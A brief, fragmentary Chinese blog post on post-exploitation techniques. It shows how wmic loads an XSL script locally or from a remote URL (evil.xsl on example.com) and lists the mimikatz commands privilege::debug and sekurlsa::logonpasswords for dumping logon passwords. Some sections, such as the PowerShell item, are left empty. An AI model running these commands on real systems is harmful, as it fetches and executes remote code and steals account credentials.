前言
wmic
是比cmd强大的命令行。轻量级调试器神器mimikatz
,后渗透常用,可以说是您
测试wmic
使用wmic能够从本地或从URL调用XSL(可扩展样式表语言)脚本。
本地:
wmic process list /FORMAT:evil.xsl
远程:
wmic os get /FORMAT:"https://example.com/evil.xsl"
本地:
privilege::debug
sekurlsa::logonpasswords
密码账号
远程:
PowerShell
项目:地址
总结
emmmm,多关注墙外的知识。
参考(抄袭):
https://www.secpulse.com/archives/71380.html
https://www.t00ls.net/viewthread.php?tid=45774&extra=&page=1
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er
评论列表(1条)
这个还不错,值得学习 🙂